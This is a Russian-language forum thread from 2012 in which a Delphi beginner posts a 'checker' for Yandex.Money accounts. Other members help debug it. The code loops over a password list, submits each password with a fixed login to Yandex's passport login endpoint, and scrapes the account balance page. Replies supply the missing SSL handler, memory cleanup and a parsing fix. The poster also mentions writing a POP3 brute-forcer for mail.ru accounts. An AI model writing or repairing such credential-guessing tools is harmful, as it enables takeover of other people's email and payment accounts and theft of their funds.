Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

чекер яд

-

Вопросы и ответы, обсуждения

- Ваши вопросы по Pascal/Delphi только в данном разделе

Ответ
 
Опции темы
Старый 20.02.2012, 14:53   #1
 Разведчик
Аватар для pavel!
 
pavel! никому не известный тип
Регистрация: 30.09.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию чекер яд

Вообщем накидал чекер яд,но дает ошику,т.е комплимирует все но когда жму старт дает ошибку
извините за кривоту моего кода делфи только начал осваивать.
Код:
var
  i:Integer;
  info:TStringList;
  p:TStringList;
  s,proxy:string;
begin
  info:=TStringList.Create;
  p:=TStringList.Create;

  for i:=0 to mmo1.Lines.Count-1 do
  begin
    info.Add('login='+edt1.Text);
    info.Add('passwd='+mmo1.Lines.Strings[i]);
    p.Text:=idhtp1.Post('https://passport.yandex.ru/passport?mode=auth&from=money&retpath=https://money.yandex.ru/index.xml&msg=money', info);
    s:=idhtp1.Get('https://money.yandex.ru/index.xml?ncrnd=7284');
    proxy:=Copy(s,Pos('title="скрыть баланс">',s)+10,pos('.</a>a',s)pos('<',s)-10);
    mmo2.Text:=proxy;

  end;

end;

end.
  Ответить с цитированием
Старый 20.02.2012, 17:03   #2
Бандеровец
 Лейтенант-командор
Аватар для VeTaL_UA
 
VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(
Регистрация: 12.08.2010
Сообщений: 727
Популярность: 30569
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 57
Поблагодарили 645 раз(а) в 386 сообщениях
Отправить сообщение для VeTaL_UA с помощью ICQ Отправить сообщение для VeTaL_UA с помощью Skype™
 
По умолчанию Re: чекер яд

Ты работаешь с https. Где IOHandler?
________________
Принимаются пожертвования любых размеров в фонд поддержки начинающих программистов
Кошельки: WMZ - Z276844220882; WMR - R231028582939; WMU - U394136909210; ЯД - 410011494605270.

Perfect World: PWDatabaseScanner, Client, PWNickRenamer, PWClientRenamer, База логинов PW, Гайд по варУ, Зарабатываем репутацию.
Delphi: Авторизация на сайте с помощью Indy, Загрузка изображений с интернета в TImage с помощью Indy, Автоматическая смена стандартной версии Indy в Delphi на Indy 10.0.76 / 10.1.5, Основы парсинга с помощью Indy, Делаем Updater до программы с помощью Indy.
Other: ShowIP, FFUUU смайлы в QIP, Как играть в Minecraft (видеокурс), Как мы захватили человечество :D, Энергия в Лицемер/TopFace, PasGen.


  Ответить с цитированием
Старый 20.02.2012, 17:33   #3
 Разведчик
Аватар для pavel!
 
pavel! никому не известный тип
Регистрация: 30.09.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от VeTaL_UAПосмотреть сообщение
Ты работаешь с https. Где IOHandler?

VeTaL_UA я буквально пару недель осваиваю делфи,читаю книги и что то пытаюся сделать,но получается все криво,я буду очень благадарен если б вы рассказали что да как
  Ответить с цитированием
Старый 20.02.2012, 18:10   #4
Знаток Dark Orbit
 Рыцарь-защитник
Аватар для Mebius
 
Mebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского Союза
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
Отправить сообщение для Mebius с помощью ICQ Отправить сообщение для Mebius с помощью Skype™
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от pavel!Посмотреть сообщение
VeTaL_UA я буквально пару недель осваиваю делфи,читаю книги и что то пытаюся сделать,но получается все криво,я буду очень благадарен если б вы рассказали что да как

кривизна на первых парах нормальна, не стоит от этого как то себя неуютно чувствовать, пара месяцев усердных занятий и будет все зашибись)

SSLOIHandler подцепи к idHttp

а разве при работе с хттпс даже с инди либы ссл не нужны?? О_о

Цитата:
info:=TStringList.Create;
p:=TStringList.Create;

создать создал, а освободить память в конце забыл!

что б форма не висла кинь на нее антифриз и включи его.

Последний раз редактировалось Mebius; 20.02.2012 в 18:18.
  Ответить с цитированием
Старый 20.02.2012, 18:16   #5
 Разведчик
Аватар для R.A.Z.O.R.
 
R.A.Z.O.R. скоро будет известенR.A.Z.O.R. скоро будет известенR.A.Z.O.R. скоро будет известенR.A.Z.O.R. скоро будет известенR.A.Z.O.R. скоро будет известен
Регистрация: 19.02.2012
Сообщений: 36
Популярность: 447
Сказал(а) спасибо: 25
Поблагодарили 50 раз(а) в 40 сообщениях
Отправить сообщение для R.A.Z.O.R. с помощью Skype™
 
По умолчанию Re: чекер яд

Выкинь Indy, используй [Ссылки могут видеть только зарегистрированные пользователи. ]
  Ответить с цитированием
Старый 20.02.2012, 18:27   #6
Знаток Dark Orbit
 Рыцарь-защитник
Аватар для Mebius
 
Mebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского Союза
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
Отправить сообщение для Mebius с помощью ICQ Отправить сообщение для Mebius с помощью Skype™
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от R.A.Z.O.R.Посмотреть сообщение
Выкинь Indy, используй [Ссылки могут видеть только зарегистрированные пользователи. ]

новичку тяжелее с synapse работать, пусть сначала на инди играть научиться, а потом уже на синапс переходит
а вообще если так судить то выкинуть и синапс! winsock лучше!
  Ответить с цитированием
Старый 20.02.2012, 19:11   #7
 Разведчик
Аватар для pavel!
 
pavel! никому не известный тип
Регистрация: 30.09.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от MebiusПосмотреть сообщение
новичку тяжелее с synapse работать, пусть сначала на инди играть научиться, а потом уже на синапс переходит
а вообще если так судить то выкинуть и синапс! winsock лучше!

В книге как раз которую читаю (Делфи глазами Хакеров) как раз автор очень хорошо расказывает о винсокс2,хорошие примеры,НО т.к книга старая
компоненты все,все старое и очень тяжело освоить плоды
Не могли б вы мне подсказать с выше указыным вашим постом с освобождением и добовлением к idhttp,я просто не понел что вы имели в вижу.Заранее вам благодарен
А насчет
Код:
кривизна на первых парах нормальна, не стоит от этого как то себя неуютно чувствовать, пара месяцев усердных занятий и будет все зашибись)
Мне просто уже не удобно создавать темы с помощью )
С ПОП3 сервером я освоился и написать брут под мыло на основе поп3 запроса,а особено хотел бы отметить майл.ру, очень легко реализовать , а работа с indy,idhttp уже более сложна,т.к требует более усердной работы и расчетов
  Ответить с цитированием
Старый 20.02.2012, 19:25   #8
Знаток Dark Orbit
 Рыцарь-защитник
Аватар для Mebius
 
Mebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского Союза
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
Отправить сообщение для Mebius с помощью ICQ Отправить сообщение для Mebius с помощью Skype™
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от pavel!Посмотреть сообщение
В книге как раз которую читаю (Делфи глазами Хакеров) как раз автор очень хорошо расказывает о винсокс2,хорошие примеры,НО т.к книга старая
компоненты все,все старое и очень тяжело освоить плоды
Не могли б вы мне подсказать с выше указыным вашим постом с освобождением и добовлением к idhttp,я просто не понел что вы имели в вижу.Заранее вам благодарен
А насчет
Код:
кривизна на первых парах нормальна, не стоит от этого как то себя неуютно чувствовать, пара месяцев усердных занятий и будет все зашибись)
Мне просто уже не удобно создавать темы с помощью )
С ПОП3 сервером я освоился и написать брут под мыло на основе поп3 запроса,а особено хотел бы отметить майл.ру, очень легко реализовать , а работа с indy,idhttp уже более сложна,т.к требует более усердной работы и расчетов

нет, работа с хттп проста как валенок, с синапсом сложнее, используй пока что инди, глазами хакера вообще тебе еще рано читать ИМХО) не с этого надо начинать.

про освобождение:


Цитата:
var
i:Integer;
info:TStringList;
p:TStringList;
s,proxy:string;
begin
info:=TStringList.Create;
p:=TStringList.Create;
try
for i:=0 to mmo1.Lines.Count-1 do
begin
info.Add('login='+edt1.Text);
info.Add('passwd='+mmo1.Lines.Strings[i]);
p.Text:=idhtp1.Post('https://passport.yandex.ru/passport?mode=auth&from=money&retpath=https://money.yandex.ru/index.xml&msg=money', info);
s:=idhtp1.Get('https://money.yandex.ru/index.xml?ncrnd=7284');
proxy:=Copy(s,Pos('title="скрыть баланс">',s)+10,pos('.</a>a',s)pos('<',s)-10);
mmo2.Text:=proxy;
end;
finally
info.Free;// освобождаем память, занятую переменной info
p.Free; // освобождаем память, занятую переменной p
end;

end;

end.

обычные типы переменных, такие как стринг, интеджер, флоат и тд очищаются автоматически при закрытии программы. а вот если освобождение память от классов надо писать обязательно, иначе при закрытии программы память занятая этими переменными останется занятой и ничейной.
  Ответить с цитированием
Старый 20.02.2012, 21:31   #9
Бандеровец
 Лейтенант-командор
Аватар для VeTaL_UA
 
VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(VeTaL_UA сломал счётчик популярности :(
Регистрация: 12.08.2010
Сообщений: 727
Популярность: 30569
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 57
Поблагодарили 645 раз(а) в 386 сообщениях
Отправить сообщение для VeTaL_UA с помощью ICQ Отправить сообщение для VeTaL_UA с помощью Skype™
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от MebiusПосмотреть сообщение
а разве при работе с хттпс даже с инди либы ссл не нужны?? О_о

Нужны. В гугле динамическую библиотеку скачать можно.
________________
Принимаются пожертвования любых размеров в фонд поддержки начинающих программистов
Кошельки: WMZ - Z276844220882; WMR - R231028582939; WMU - U394136909210; ЯД - 410011494605270.

Perfect World: PWDatabaseScanner, Client, PWNickRenamer, PWClientRenamer, База логинов PW, Гайд по варУ, Зарабатываем репутацию.
Delphi: Авторизация на сайте с помощью Indy, Загрузка изображений с интернета в TImage с помощью Indy, Автоматическая смена стандартной версии Indy в Delphi на Indy 10.0.76 / 10.1.5, Основы парсинга с помощью Indy, Делаем Updater до программы с помощью Indy.
Other: ShowIP, FFUUU смайлы в QIP, Как играть в Minecraft (видеокурс), Как мы захватили человечество :D, Энергия в Лицемер/TopFace, PasGen.


  Ответить с цитированием
Старый 20.02.2012, 22:09   #10
 Разведчик
Аватар для Ulelern
 
Ulelern никому не известный тип
Регистрация: 20.02.2012
Сообщений: 0
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от MebiusПосмотреть сообщение
иначе при закрытии программы память занятая этими переменными останется занятой и ничейной.

После перезагрузки компьютер память вить очистится?
  Ответить с цитированием
Старый 20.02.2012, 22:32   #11
Знаток Dark Orbit
 Рыцарь-защитник
Аватар для Mebius
 
Mebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского Союза
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
Отправить сообщение для Mebius с помощью ICQ Отправить сообщение для Mebius с помощью Skype™
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от VeTaL_UAПосмотреть сообщение
Нужны. В гугле динамическую библиотеку скачать можно.

ну тогда будут либы эти еще и тут))) 0,9,8,18 версия

Цитата:
После перезагрузки компьютер память вить очистится?

а что если я постоянно пользуюсь программой которая не очищает память и я перезагружаю пк раз в месяц? З.Ы. от лучше не лезть если не все обдумал)

Последний раз редактировалось Mebius; 25.10.2012 в 20:24.
  Ответить с цитированием
Старый 21.02.2012, 10:17   #12
 Разведчик
Аватар для pavel!
 
pavel! никому не известный тип
Регистрация: 30.09.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от MebiusПосмотреть сообщение
ну тогда будут либы эти еще и тут))) 0,9,8,18 версия



а что если я постоянно пользуюсь программой которая не очищает память и я перезагружаю пк раз в месяц? З.Ы. от лучше не лезть если не все обдумал)

спасибо за помощь
не подскажите тогда что почитать? в книжные магазины заходил,а они и не знают что такое делфи,неподскажите что из электронных книг почитать?

Добавлено через 49 минут
OIHandler is not valid дает ошибку сново
не знаю что и делать

Последний раз редактировалось pavel!; 21.02.2012 в 11:08. Причина: Добавлено сообщение
  Ответить с цитированием
Старый 21.02.2012, 19:29   #13
Знаток Dark Orbit
 Рыцарь-защитник
Аватар для Mebius
 
Mebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского СоюзаMebius трижды герой Советского Союза
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
Отправить сообщение для Mebius с помощью ICQ Отправить сообщение для Mebius с помощью Skype™
 
По умолчанию Re: чекер яд

Цитата:
Сообщение от pavel!Посмотреть сообщение
спасибо за помощь
не подскажите тогда что почитать? в книжные магазины заходил,а они и не знают что такое делфи,неподскажите что из электронных книг почитать?

Добавлено через 49 минут
OIHandler is not valid дает ошибку сново
не знаю что и делать

читай библию делфи 2 или 3 издание (без разницы)
  Ответить с цитированием
Старый 03.03.2012, 10:32   #14
 Разведчик
Аватар для MastaDan
 
MastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компании
Регистрация: 03.10.2011
Сообщений: 27
Популярность: 1039
Сказал(а) спасибо: 131
Поблагодарили 98 раз(а) в 47 сообщениях
Отправить сообщение для MastaDan с помощью ICQ Отправить сообщение для MastaDan с помощью Skype™
 
По умолчанию Re: чекер яд

У меня ошибку не выдает, но и при старте нечего не делает... стоит Delphi XE2
Нашел ошибку в коде
было=> proxy:=Copy(s,Pos('title="скрыть баланс">',s)+10,pos('.</a>a',s)pos('<',s)-10);
надо=> proxy:=Copy(s,Pos('title="скрыть баланс">',s)+10,pos('.</a>a',s)-pos('<',s)-10);

Последний раз редактировалось MastaDan; 03.03.2012 в 10:35.
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 06:36.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net